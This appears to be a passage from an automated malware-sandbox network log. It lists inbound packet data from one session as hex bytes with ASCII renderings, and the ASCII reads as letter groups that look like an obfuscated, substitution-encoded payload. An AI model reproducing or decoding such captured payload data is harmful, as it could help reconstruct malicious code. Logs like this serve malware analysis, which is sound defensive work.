2021-10-27 01:03:26 UTC	1136	IN	Data Raw: 70 78 20 71 71 78 20 71 68 68 20 71 68 4f 20 4f 6a 20 71 65 49 20 49 78 20 78 70 20 71 70 70 20 70 78 20 77 78 20 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 6a 63 20 63 78 20 78 63 20 49 65 20 63 20 71 71 71 20 65 63 71 20 63 68 20 71 65 20 70 49 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 65 78 20 71 71 65 20 65 78 77 20 71 65 78 20 65 71 70 20 63 65 20 65 71 49 20 71 71 78 20 71 20 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 6a 65 20 70 78 20 4f 63 20 63 49 20 71 63 77 20 71 71 78 20 71 70 70 20 78 70 20 65 71 70 20 70 65 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 68 65 20 63 68 20 71 65 4f 20 71 65 77 20 65 68 78 20 70 49 20 65 65 77 20 71 71 77 20 63 6a 20 65 71 20 63 68 20 78 70 20 63 68 20 63 78 20 49 49 20 71 71 78 20 71 68 70 Data Ascii: px qqx qhh qhO Oj qeI Ix xp qpp px wx qw qhO qqe ch xp jc cx xc Ie c qqq ecq ch qe pI cx px qqx qqw qex qqe exw qex eqp ce eqI qqx q O qqe ch xp ch je px Oc cI qcw qqx qpp xp eqp pe px qqx qqw qhO qhe ch qeO qew ehx pI eew qqw cj eq ch xp ch cx II qqx qhp
2021-10-27 01:03:26 UTC	1140	IN	Data Raw: 20 6a 68 20 71 71 70 20 71 71 65 20 71 68 70 20 71 68 70 20 71 70 65 20 78 70 20 63 68 20 63 78 20 70 78 20 65 78 78 20 71 68 4f 20 71 63 70 20 71 68 49 20 70 63 20 78 70 20 63 65 20 63 63 20 71 49 20 65 78 49 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 70 65 20 78 65 20 71 4f 77 20 77 70 20 65 6a 78 20 71 71 49 20 71 68 77 20 71 71 6a 20 71 77 68 20 71 70 68 20 63 68 20 63 78 20 70 78 20 71 71 78 20 65 78 6a 20 71 68 4f 20 71 65 71 20 70 4f 20 71 77 65 20 63 68 20 78 4f 20 70 63 20 71 4f 70 20 65 78 71 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 77 4f 20 63 78 20 71 68 4f 20 65 63 20 71 70 20 71 68 4f 20 71 71 4f 20 63 71 20 71 70 68 20 71 70 6a 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 65 6a 63 20 71 71 65 20 4f 71 20 4f 71 20 71 68 68 20 Data Ascii: jh qqp qqe qhp qhp qpe xp ch cx px exx qhO qcp qhI pc xp ce cc qI exI qqw qhO qqe ch qpe xe qOw wp ejx qqI qhw qqj qwh qph ch cx px qqx exj qhO qeq pO qwe ch xO pc qOp exq qhO qqe ch xp qwO cx qhO ec qp qhO qqO cq qph qpj cx px qqx qqw ejc qqe Oq Oq qhh
2021-10-27 01:03:26 UTC	1144	IN	Data Raw: 71 20 71 77 77 20 71 71 68 20 70 71 20 77 4f 20 71 71 49 20 4f 20 65 71 4f 20 63 68 20 78 70 20 63 68 20 63 78 20 49 49 20 71 71 78 20 65 6a 49 20 65 6a 70 20 78 49 20 63 63 20 71 78 20 63 71 20 71 77 70 20 65 63 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 71 6a 63 20 71 70 71 20 78 4f 20 71 71 4f 20 77 78 20 71 68 70 20 71 77 49 20 71 63 6a 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20 71 65 70 20 65 78 6a 20 4f 78 20 63 6a 20 71 71 78 20 63 63 20 63 65 20 65 65 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 63 78 20 78 65 20 71 4f 77 20 77 70 20 71 77 65 20 71 71 77 20 78 49 20 71 71 6a 20 71 70 65 20 71 63 49 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 4f 20 71 71 68 20 71 70 4f 20 71 70 65 20 70 77 20 Data Ascii: q qww qqh pq wO qqI O eqO ch xp ch cx II qqx ejI ejp xI cc qx cq qwp ecc qqx qqw qhO qqe jI xp qjc qpq xO qqO wx qhp qwI qcj xp ch cx px qhh qqw qep exj Ox cj qqx cc ce eee qqw qhO qqe ch cx xe qOw wp qwe qqw xI qqj qpe qcI ch cx px qqx qO qqh qpO qpe pw
2021-10-27 01:03:26 UTC	1147	IN	Data Raw: 63 65 20 4f 63 20 63 71 20 65 65 49 20 65 6a 65 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 71 20 78 70 20 71 68 49 20 71 77 78 20 63 6a 20 71 71 49 20 78 20 71 68 70 20 71 49 70 20 71 78 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 49 20 71 71 77 20 71 49 63 20 65 6a 65 20 4f 71 20 63 78 20 77 68 20 63 63 20 65 65 68 20 65 68 63 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 63 78 20 65 68 63 20 65 71 20 71 71 77 20 65 78 20 71 71 6a 20 71 6a 70 20 65 78 68 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 63 20 71 68 4f 20 49 78 20 71 77 71 20 70 77 20 63 68 20 49 77 20 70 63 20 71 63 68 20 71 70 68 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 71 20 63 78 20 65 78 20 65 6a 63 20 65 49 20 71 68 77 20 63 20 63 71 20 65 78 Data Ascii: ce Oc cq eeI eje qqx qqw qhO qqe cq xp qhI qwx cj qqI x qhp qIp qxh xp ch cx px qqI qqw qIc eje Oq cx wh cc eeh ehc qqw qhO qqe ch xO ch cx ehc eq qqw ex qqj qjp exh ch cx px qqx qqc qhO Ix qwq pw ch Iw pc qch qph qhO qqe ch xp cq cx ex ejc eI qhw c cq ex
2021-10-27 01:03:26 UTC	1151	IN	Data Raw: 78 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 70 6a 20 71 71 68 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 6a 4f 20 71 68 20 63 68 20 63 78 20 70 49 20 71 71 78 20 71 49 68 20 70 77 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 65 6a 20 71 68 49 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 77 71 20 71 78 20 63 68 20 63 78 20 70 63 20 71 71 78 20 4f 49 20 70 65 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 70 77 20 71 68 77 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 65 6a 4f 20 71 63 20 63 68 20 63 78 20 70 63 20 71 71 78 20 49 78 20 78 78 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 68 6a 20 65 71 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 4f 63 20 71 71 6a 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 68 78 20 78 78 20 71 Data Ascii: x qqe ch xO ch qpj qqh qqx qqw qhp qqe qjO qh ch cx pI qqx qIh pw qqe ch xO ch qej qhI qqx qqw qhp qqe qwq qx ch cx pc qqx OI pe qqe ch xO ch pw qhw qqx qqw qhp qqe ejO qc ch cx pc qqx Ix xx qqe ch ch ch qhj eq qqx qqw qqh qqe Oc qqj ch cx pc qqx ehx xx q
2021-10-27 01:03:26 UTC	1155	IN	Data Raw: 65 20 63 68 20 78 4f 20 63 68 20 70 6a 20 6a 70 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 71 77 4f 20 49 49 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 70 70 20 6a 68 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 63 63 20 6a 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 71 65 77 20 49 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 78 68 20 65 63 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 63 71 20 6a 65 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 71 78 6a 20 49 70 20 63 68 20 63 78 20 70 68 20 71 71 78 20 71 77 65 20 65 63 20 71 71 65 20 63 68 20 63 6a 20 63 68 20 71 4f 63 20 6a 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 6a 71 20 49 4f 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 65 20 65 78 20 71 71 65 20 63 68 20 63 68 Data Ascii: e ch xO ch pj jp qqx qqw qqq qqe qwO II ch cx pc qqx qpp jh qqe ch xO ch cc je qqx qqw qhp qqe qew Ip ch cx pc qqx exh ec qqe ch ch ch qcq je qqx qqw qqh qqe qxj Ip ch cx ph qqx qwe ec qqe ch cj ch qOc je qqx qqw qhp qqe jq IO ch cx pc qqx qe ex qqe ch ch
2021-10-27 01:03:26 UTC	1159	IN	Data Raw: 71 78 6a 20 63 71 20 65 78 77 20 70 78 20 71 78 78 20 49 4f 20 70 68 20 71 71 6a 20 65 78 6a 20 78 70 20 65 65 68 20 49 20 71 63 4f 20 71 71 63 20 71 4f 49 20 71 68 4f 20 71 77 49 20 71 49 20 71 77 78 20 63 78 20 71 49 77 20 70 78 20 71 4f 71 20 65 78 71 20 71 68 20 71 71 65 20 71 49 6a 20 78 70 20 65 6a 71 20 71 77 70 20 63 71 20 71 71 78 20 65 65 70 20 71 68 4f 20 71 77 78 20 71 70 65 20 70 77 20 63 68 20 71 49 77 20 70 78 20 71 6a 68 20 65 78 71 20 71 68 20 71 71 65 20 71 49 6a 20 78 70 20 78 70 20 71 77 4f 20 63 71 20 71 71 78 20 6a 49 20 71 68 78 20 71 6a 71 20 78 68 20 70 77 20 63 68 20 71 63 20 70 78 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 65 77 20 78 4f 20 71 4f 6a 20 78 78 20 78 49 20 71 71 77 20 6a 49 20 71 68 4f 20 71 6a 71 20 78 68 20 Data Ascii: qxj cq exw px qxx IO ph qqj exj xp eeh I qcO qqc qOI qhO qwI qI qwx cx qIw px qOq exq qh qqe qIj xp ejq qwp cq qqx eep qhO qwx qpe pw ch qIw px qjh exq qh qqe qIj xp xp qwO cq qqx jI qhx qjq xh pw ch qc px qeO qqq qh qqe ew xO qOj xx xI qqw jI qhO qjq xh
2021-10-27 01:03:26 UTC	1163	IN	Data Raw: 65 65 70 20 71 68 78 20 71 65 6a 20 71 63 4f 20 71 78 70 20 49 6a 20 6a 71 20 70 65 20 4f 4f 20 65 71 49 20 71 20 71 71 78 20 65 63 71 20 78 4f 20 71 4f 6a 20 78 78 20 70 71 20 71 71 63 20 71 65 78 20 71 71 71 20 70 78 20 71 63 4f 20 4f 65 20 78 70 20 65 63 63 20 70 63 20 77 63 20 65 71 49 20 71 68 78 20 71 71 6a 20 65 63 71 20 78 4f 20 71 65 78 20 71 63 63 20 70 71 20 71 71 63 20 71 70 68 20 71 68 70 20 6a 4f 20 71 63 4f 20 71 6a 68 20 49 6a 20 4f 63 20 70 71 20 78 77 20 65 71 49 20 71 77 78 20 71 65 63 20 4f 71 20 63 6a 20 70 78 20 71 63 63 20 71 63 77 20 71 65 77 20 78 78 20 71 68 78 20 65 6a 77 20 78 49 20 65 63 63 20 49 6a 20 71 71 71 20 70 71 20 65 20 65 71 49 20 71 70 71 20 71 65 63 20 71 68 77 20 63 6a 20 77 78 20 71 63 63 20 77 63 20 71 71 4f 20 Data Ascii: eep qhx qej qcO qxp Ij jq pe OO eqI q qqx ecq xO qOj xx pq qqc qex qqq px qcO Oe xp ecc pc wc eqI qhx qqj ecq xO qex qcc pq qqc qph qhp jO qcO qjh Ij Oc pq xw eqI qwx qec Oq cj px qcc qcw qew xx qhx ejw xI ecc Ij qqq pq e eqI qpq qec qhw cj wx qcc wc qqO
2021-10-27 01:03:26 UTC	1168	IN	Data Raw: 20 71 6a 71 20 78 68 20 63 6a 20 63 71 20 65 71 63 20 70 49 20 65 71 49 20 71 4f 49 20 71 71 68 20 71 71 49 20 65 71 71 20 63 68 20 65 78 63 20 71 63 49 20 70 77 20 71 71 70 20 78 71 20 71 68 4f 20 6a 49 20 71 63 6a 20 70 77 20 63 68 20 71 70 6a 20 70 49 20 65 68 65 20 65 65 6a 20 71 68 20 71 71 65 20 65 6a 63 20 63 6a 20 71 6a 6a 20 71 6a 63 20 71 63 20 4f 77 20 71 68 68 20 71 68 63 20 71 70 6a 20 71 6a 71 20 70 65 20 6a 6a 20 78 77 20 70 68 20 71 49 77 20 71 4f 49 20 65 68 63 20 71 71 65 20 65 6a 63 20 63 6a 20 71 77 63 20 78 65 20 49 71 20 4f 77 20 71 70 70 20 71 68 4f 20 71 78 65 20 71 63 78 20 49 78 20 6a 6a 20 65 6a 4f 20 70 71 20 71 78 4f 20 71 4f 49 20 65 68 20 4f 4f 20 4f 78 20 78 70 20 65 6a 78 20 71 63 4f 20 71 71 68 20 71 65 68 20 65 63 20 71 Data Ascii: qjq xh cj cq eqc pI eqI qOI qqh qqI eqq ch exc qcI pw qqp xq qhO jI qcj pw ch qpj pI ehe eej qh qqe ejc cj qjj qjc qc Ow qhh qhc qpj qjq pe jj xw ph qIw qOI ehc qqe ejc cj qwc xe Iq Ow qpp qhO qxe qcx Ix jj ejO pq qxO qOI eh OO Ox xp ejx qcO qqh qeh ec q
2021-10-27 01:03:26 UTC	1179	IN	Data Raw: 65 77 20 65 49 20 6a 20 6a 20 63 68 20 71 71 63 20 4f 6a 20 4f 71 20 6a 49 20 65 4f 20 65 77 20 70 20 6a 68 20 77 68 20 78 70 20 4f 77 20 77 4f 20 6a 4f 20 49 20 71 49 20 68 20 4f 78 20 71 71 6a 20 4f 63 20 4f 63 20 77 68 20 63 4f 20 65 70 20 71 49 20 6a 20 78 20 71 65 77 20 4f 63 20 70 49 20 70 6a 20 63 49 20 71 71 78 20 78 70 20 4f 20 65 63 20 77 68 20 4f 63 20 49 78 20 71 71 49 20 6a 70 20 65 4f 20 65 20 6a 68 20 71 77 20 70 68 20 4f 65 20 70 77 20 71 71 4f 20 6a 65 20 49 20 77 20 78 20 71 70 20 77 71 20 49 70 20 70 77 20 63 78 20 71 77 20 65 65 20 65 70 20 65 63 20 6a 71 20 49 78 20 71 71 78 20 49 78 20 70 4f 20 6a 63 20 71 20 65 68 20 71 63 20 65 70 20 70 77 20 4f 4f 20 77 68 20 70 77 20 6a 65 20 65 6a 20 71 71 77 20 78 49 20 6a 71 20 4f 65 20 49 77 Data Ascii: ew eI j j ch qqc Oj Oq jI eO ew p jh wh xp Ow wO jO I qI h Ox qqj Oc Oc wh cO ep qI j x qew Oc pI pj cI qqx xp O ec wh Oc Ix qqI jp eO e jh qw ph Oe pw qqO je I w x qp wq Ip pw cx qw ee ep ec jq Ix qqx Ix pO jc q eh qc ep pw OO wh pw je ej qqw xI jq Oe Iw
2021-10-27 01:03:26 UTC	1195	IN	Data Raw: 6a 20 78 6a 20 65 71 20 71 71 4f 20 4f 20 77 68 20 4f 78 20 65 78 20 63 70 20 68 20 65 71 20 49 49 20 4f 6a 20 49 20 70 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 63 65 20 71 65 68 20 78 20 77 63 20 71 68 71 20 4f 4f 20 65 68 20 63 78 20 78 71 20 65 65 20 71 65 6a 20 70 4f 20 71 71 4f 20 4f 49 20 71 70 20 65 63 20 65 20 65 68 20 63 6a 20 71 71 4f 20 49 20 71 71 77 20 63 20 71 71 65 20 70 49 20 49 49 20 4f 78 20 63 49 20 49 4f 20 4f 70 20 70 63 20 77 4f 20 71 68 65 20 78 63 20 71 49 20 6a 70 20 78 65 20 71 68 6a 20 4f 71 20 77 78 20 70 77 20 77 20 65 4f 20 77 65 20 71 68 4f 20 4f 78 20 70 71 20 70 6a 20 77 68 20 70 4f 20 6a 70 20 71 71 78 20 70 49 20 70 68 20 71 20 4f 6a 20 4f 78 20 71 65 77 20 4f 49 20 6a 68 20 63 4f 20 6a 20 63 68 20 6a 65 20 63 Data Ascii: j xj eq qqO O wh Ox ex cp h eq II Oj I pc qq px pq we ep ce qeh x wc qhq OO eh cx xq ee qej pO qqO OI qp ec e eh cj qqO I qqw c qqe pI II Ox cI IO Op pc wO qhe xc qI jp xe qhj Oq wx pw w eO we qhO Ox pq pj wh pO jp qqx pI ph q Oj Ox qew OI jh cO j ch je c
2021-10-27 01:03:26 UTC	1211	IN	Data Raw: 68 70 20 6a 20 49 70 20 78 6a 20 4f 20 71 65 68 20 49 77 20 4f 65 20 78 20 71 71 20 77 20 6a 68 20 6a 70 20 65 78 20 77 20 71 65 77 20 71 65 78 20 71 71 49 20 65 71 20 6a 70 20 71 70 20 70 68 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 63 71 20 49 70 20 49 70 20 6a 65 20 71 77 20 71 68 68 20 70 4f 20 71 65 6a 20 49 49 20 71 68 6a 20 63 63 20 77 20 78 77 20 65 49 20 77 71 20 71 71 6a 20 65 20 71 65 68 20 71 68 4f 20 78 65 20 77 20 65 49 20 77 77 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 71 49 20 63 77 20 78 77 20 63 77 20 4f 6a 20 71 65 71 20 71 68 49 20 71 71 71 20 65 49 20 65 68 20 49 6a 20 71 20 49 77 20 77 78 20 4f 20 71 65 49 20 71 65 49 20 6a 77 20 78 70 20 6a 78 20 6a 63 20 78 4f 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 63 Data Ascii: hp j Ip xj O qeh Iw Oe x qq w jh jp ex w qew qex qqI eq jp qp ph ww ch qO qc wq cq Ip Ip je qw qhh pO qej II qhj cc w xw eI wq qqj e qeh qhO xe w eI ww qc xp qw qq jw qI cw xw cw Oj qeq qhI qqq eI eh Ij q Iw wx O qeI qeI jw xp jx jc xO qc qj ch eq qhc j c
2021-10-27 01:03:26 UTC	1227	IN	Data Raw: 6a 4f 20 71 20 4f 4f 20 77 6a 20 6a 20 77 71 20 65 4f 20 77 4f 20 71 71 77 20 77 70 20 77 77 20 49 77 20 4f 6a 20 71 68 65 20 77 70 20 71 4f 20 65 77 20 63 49 20 78 78 20 49 78 20 77 20 4f 65 20 71 68 65 20 71 71 63 20 6a 65 20 65 4f 20 6a 77 20 49 71 20 6a 70 20 78 20 4f 70 20 71 71 49 20 71 65 71 20 49 71 20 65 49 20 49 63 20 78 71 20 78 71 20 4f 77 20 68 20 77 71 20 77 70 20 6a 70 20 71 68 20 6a 77 20 6a 78 20 49 70 20 49 70 20 71 71 6a 20 6a 20 71 65 49 20 71 68 65 20 65 78 20 49 77 20 63 49 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 4f 77 20 65 71 20 77 20 49 71 20 77 20 70 63 20 71 71 77 20 77 71 20 49 70 20 77 20 65 70 20 49 77 20 6a 70 20 63 20 77 68 20 71 68 65 20 71 65 49 20 71 68 71 20 4f 77 20 78 63 20 65 49 20 49 71 20 63 71 20 4f 78 20 Data Ascii: jO q OO wj j wq eO wO qqw wp ww Iw Oj qhe wp qO ew cI xx Ix w Oe qhe qqc je eO jw Iq jp x Op qqI qeq Iq eI Ic xq xq Ow h wq wp jp qh jw jx Ip Ip qqj j qeI qhe ex Iw cI ww ch qO qc wq Ow eq w Iq w pc qqw wq Ip w ep Iw jp c wh qhe qeI qhq Ow xc eI Iq cq Ox
2021-10-27 01:03:26 UTC	1243	IN	Data Raw: 6a 20 78 20 65 78 20 63 78 20 71 65 77 20 70 4f 20 77 20 4f 77 20 63 6a 20 70 49 20 65 20 70 63 20 71 77 20 71 65 78 20 4f 20 71 71 77 20 71 71 6a 20 63 49 20 49 68 20 49 63 20 6a 77 20 49 63 20 4f 4f 20 71 6a 20 71 63 20 63 78 20 71 71 4f 20 77 4f 20 78 20 70 20 49 78 20 4f 63 20 71 68 63 20 65 65 20 71 68 68 20 71 71 20 68 20 63 63 20 6a 68 20 6a 65 20 71 65 6a 20 71 68 49 20 71 68 78 20 49 78 20 71 68 6a 20 65 49 20 6a 77 20 6a 6a 20 6a 63 20 49 20 70 77 20 71 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 49 63 20 68 20 4f 78 20 6a 20 71 20 71 68 68 20 77 68 20 63 63 20 78 65 20 70 20 4f 71 20 71 68 68 20 71 71 20 71 71 4f 20 63 4f 20 49 71 20 65 49 20 63 77 20 49 65 20 49 77 20 4f 63 20 70 63 20 71 71 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 Data Ascii: j x ex cx qew pO w Ow cj pI e pc qw qex O qqw qqj cI Ih Ic jw Ic OO qj qc cx qqO wO x p Ix Oc qhc ee qhh qq h cc jh je qej qhI qhx Ix qhj eI jw jj jc I pw qc qq px pq we ep Ic h Ox j q qhh wh cc xe p Oq qhh qq qqO cO Iq eI cw Ie Iw Oc pc qq qhc qqx pI ph
2021-10-27 01:03:26 UTC	1259	IN	Data Raw: 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 65 49 20 49 63 20 4f 63 20 71 20 71 68 77 20 49 4f 20 4f 78 20 65 20 49 68 20 65 78 20 70 71 20 71 65 20 71 77 20 77 20 4f 6a 20 4f 78 20 49 77 20 63 6a 20 65 65 20 6a 20 6a 6a 20 78 4f 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 65 4f 20 65 49 20 4f 20 71 65 78 20 70 71 20 71 68 4f 20 4f 68 20 49 68 20 49 20 68 20 65 20 4f 20 77 71 20 71 65 65 20 71 65 71 20 6a 20 49 65 20 49 63 20 63 63 20 71 78 20 63 78 20 49 20 77 65 20 77 71 20 6a 20 63 68 20 78 6a 20 49 78 20 63 6a 20 65 78 20 71 71 49 20 4f 65 20 70 63 20 77 49 20 49 6a 20 49 6a 20 49 70 20 78 49 20 65 6a 20 77 63 20 49 20 71 65 6a 20 71 71 4f 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 71 20 71 68 77 20 70 4f 20 71 68 49 20 4f 49 20 63 Data Ascii: qc xp qw qq jw eI Ic Oc q qhw IO Ox e Ih ex pq qe qw w Oj Ox Iw cj ee j jj xO qc qj ch eq qhc j eO eI O qex pq qhO Oh Ih I h e O wq qee qeq j Ie Ic cc qx cx I we wq j ch xj Ix cj ex qqI Oe pc wI Ij Ij Ip xI ej wc I qej qqO qhc qqx pI ph q qhw pO qhI OI c
2021-10-27 01:03:26 UTC	1275	IN	Data Raw: 6a 4f 20 4f 77 20 4f 71 20 63 20 70 65 20 63 4f 20 77 78 20 6a 63 20 63 4f 20 78 20 4f 68 20 70 77 20 71 63 20 71 71 20 70 78 20 70 71 20 77 65 20 65 70 20 49 68 20 71 68 4f 20 4f 77 20 71 68 4f 20 71 68 68 20 78 70 20 6a 4f 20 65 78 20 63 68 20 77 20 71 65 68 20 77 20 71 68 68 20 70 6a 20 65 20 63 20 6a 65 20 65 70 20 6a 78 20 71 68 49 20 70 65 20 71 71 63 20 71 71 20 71 68 63 20 71 71 78 20 70 49 20 70 68 20 71 20 71 71 77 20 4f 68 20 49 49 20 49 20 65 20 71 49 20 49 77 20 70 20 65 65 20 71 65 63 20 71 65 49 20 49 4f 20 71 71 4f 20 65 49 20 65 63 20 65 65 20 6a 70 20 65 20 71 65 77 20 71 68 68 20 70 4f 20 71 65 77 20 65 65 20 71 68 20 49 6a 20 65 77 20 65 20 71 71 20 71 71 6a 20 4f 78 20 70 6a 20 71 70 20 65 68 20 49 6a 20 6a 71 20 65 63 20 77 71 20 70 Data Ascii: jO Ow Oq c pe cO wx jc cO x Oh pw qc qq px pq we ep Ih qhO Ow qhO qhh xp jO ex ch w qeh w qhh pj e c je ep jx qhI pe qqc qq qhc qqx pI ph q qqw Oh II I e qI Iw p ee qec qeI IO qqO eI ec ee jp e qew qhh pO qew ee qh Ij ew e qq qqj Ox pj qp eh Ij jq ec wq p
2021-10-27 01:03:26 UTC	1291	IN	Data Raw: 68 20 6a 78 20 71 70 20 70 68 20 77 77 20 63 68 20 71 4f 20 71 63 20 77 71 20 78 63 20 71 68 20 63 20 71 71 20 6a 71 20 4f 78 20 71 65 78 20 71 68 6a 20 4f 78 20 65 63 20 78 20 63 71 20 63 77 20 63 65 20 71 71 4f 20 65 20 4f 68 20 71 68 63 20 6a 4f 20 71 71 20 6a 20 49 68 20 77 77 20 71 63 20 78 70 20 71 77 20 71 71 20 6a 77 20 49 71 20 49 65 20 49 65 20 65 4f 20 71 68 77 20 71 71 77 20 49 20 71 20 78 20 49 78 20 71 63 20 77 6a 20 6a 77 20 71 68 49 20 49 63 20 71 71 77 20 71 71 63 20 68 20 6a 68 20 65 77 20 71 71 20 65 6a 20 71 63 20 71 6a 20 63 68 20 65 71 20 71 68 63 20 6a 20 65 68 20 71 71 20 71 68 20 4f 4f 20 70 6a 20 71 65 77 20 71 71 77 20 6a 71 20 49 49 20 71 49 20 63 4f 20 6a 63 20 70 71 20 49 70 20 71 65 6a 20 49 20 65 4f 20 71 77 20 78 4f 20 4f Data Ascii: h jx qp ph ww ch qO qc wq xc qh c qq jq Ox qex qhj Ox ec x cq cw ce qqO e Oh qhc jO qq j Ih ww qc xp qw qq jw Iq Ie Ie eO qhw qqw I q x Ix qc wj jw qhI Ic qqw qqc h jh ew qq ej qc qj ch eq qhc j eh qq qh OO pj qew qqw jq II qI cO jc pq Ip qej I eO qw xO O
2021-10-27 01:03:26 UTC	1307	IN	Data Raw: 77 20 70 77 20 49 49 20 71 71 20 63 77 20 71 49 20 65 68 20 71 71 65 20 71 71 6a 20 49 49 20 70 77 20 70 77 20 6a 65 20 65 6a 20 78 4f 20 70 20 71 4f 20 49 78 20 77 6a 20 49 49 20 49 49 20 63 4f 20 68 20 71 71 77 20 63 77 20 65 20 70 6a 20 4f 78 20 49 63 20 70 68 20 63 4f 20 68 20 65 78 20 78 6a 20 65 63 20 4f 65 20 70 71 20 4f 78 20 71 71 49 20 63 49 20 65 4f 20 65 65 20 49 20 71 71 65 20 49 63 20 70 63 20 77 68 20 71 68 63 20 65 71 20 77 20 71 20 65 20 63 78 20 4f 78 20 49 4f 20 49 63 20 4f 78 20 70 78 20 6a 6a 20 65 63 20 70 20 65 71 20 49 49 20 78 70 20 70 63 20 70 6a 20 6a 65 20 78 63 20 78 70 20 65 71 20 65 71 20 70 71 20 49 4f 20 77 68 20 70 77 20 63 78 20 6a 68 20 71 49 20 49 71 20 71 77 20 77 68 20 70 70 20 63 68 20 70 71 20 78 4f 20 49 20 78 65 Data Ascii: w pw II qq cw qI eh qqe qqj II pw pw je ej xO p qO Ix wj II II cO h qqw cw e pj Ox Ic ph cO h ex xj ec Oe pq Ox qqI cI eO ee I qqe Ic pc wh qhc eq w q e cx Ox IO Ic Ox px jj ec p eq II xp pc pj je xc xp eq eq pq IO wh pw cx jh qI Iq qw wh pp ch pq xO I xe
2021-10-27 01:03:26 UTC	1323	IN	Data Raw: 6a 63 20 71 70 65 20 65 78 4f 20 71 71 63 20 71 68 68 20 65 6a 49 20 70 71 20 6a 49 20 63 63 20 63 6a 20 63 49 20 77 6a 20 71 71 4f 20 4f 49 20 71 65 77 20 65 78 68 20 71 63 63 20 78 4f 20 78 49 20 6a 4f 20 65 71 6a 20 70 6a 20 71 68 6a 20 65 6a 49 20 71 68 63 20 63 70 20 78 63 20 6a 63 20 71 70 6a 20 71 71 77 20 71 71 49 20 71 71 77 20 71 71 71 20 71 71 6a 20 49 68 20 78 63 20 63 63 20 6a 63 20 70 6a 20 71 65 68 20 71 65 6a 20 71 71 65 20 71 71 77 20 6a 63 20 71 77 49 20 65 63 71 20 78 6a 20 77 65 20 71 65 65 20 71 68 68 20 78 63 20 4f 70 20 71 77 4f 20 78 71 20 63 70 20 6a 4f 20 65 68 20 4f 4f 20 63 6a 20 71 68 68 20 71 71 65 20 78 70 20 63 49 20 6a 63 20 71 70 65 20 71 63 77 20 4f 4f 20 65 78 63 20 71 49 78 20 71 68 6a 20 63 6a 20 63 78 20 49 68 20 78 Data Ascii: jc qpe exO qqc qhh ejI pq jI cc cj cI wj qqO OI qew exh qcc xO xI jO eqj pj qhj ejI qhc cp xc jc qpj qqw qqI qqw qqq qqj Ih xc cc jc pj qeh qej qqe qqw jc qwI ecq xj we qee qhh xc Op qwO xq cp jO eh OO cj qhh qqe xp cI jc qpe qcw OO exc qIx qhj cj cx Ih x
2021-10-27 01:03:26 UTC	1339	IN	Data Raw: 6a 20 71 65 77 20 71 71 6a 20 63 49 20 71 6a 49 20 6a 4f 20 71 78 20 65 70 20 70 70 20 65 78 77 20 63 6a 20 65 65 77 20 71 68 68 20 77 20 71 4f 77 20 65 68 20 71 70 20 70 78 20 77 20 65 65 71 20 77 63 20 71 78 49 20 77 4f 20 71 63 63 20 71 65 70 20 65 65 20 78 70 20 78 49 20 71 78 49 20 65 68 4f 20 77 68 20 65 78 63 20 6a 68 20 71 6a 71 20 6a 20 65 68 70 20 71 65 70 20 71 63 63 20 4f 77 20 71 65 70 20 65 65 65 20 71 49 63 20 71 77 63 20 71 6a 63 20 65 68 70 20 71 71 49 20 71 68 77 20 65 65 6a 20 71 68 78 20 4f 78 20 4f 63 20 78 65 20 4f 65 20 6a 6a 20 71 70 49 20 71 71 63 20 65 6a 49 20 71 71 6a 20 65 78 63 20 71 71 20 77 68 20 65 63 6a 20 71 77 68 20 71 68 77 20 70 20 65 78 65 20 71 77 63 20 65 71 49 20 65 65 63 20 65 65 4f 20 49 71 20 71 6a 78 20 49 4f Data Ascii: j qew qqj cI qjI jO qx ep pp exw cj eew qhh w qOw eh qp px w eeq wc qxI wO qcc qep ee xp xI qxI ehO wh exc jh qjq j ehp qep qcc Ow qep eee qIc qwc qjc ehp qqI qhw eej qhx Ox Oc xe Oe jj qpI qqc ejI qqj exc qq wh ecj qwh qhw p exe qwc eqI eec eeO 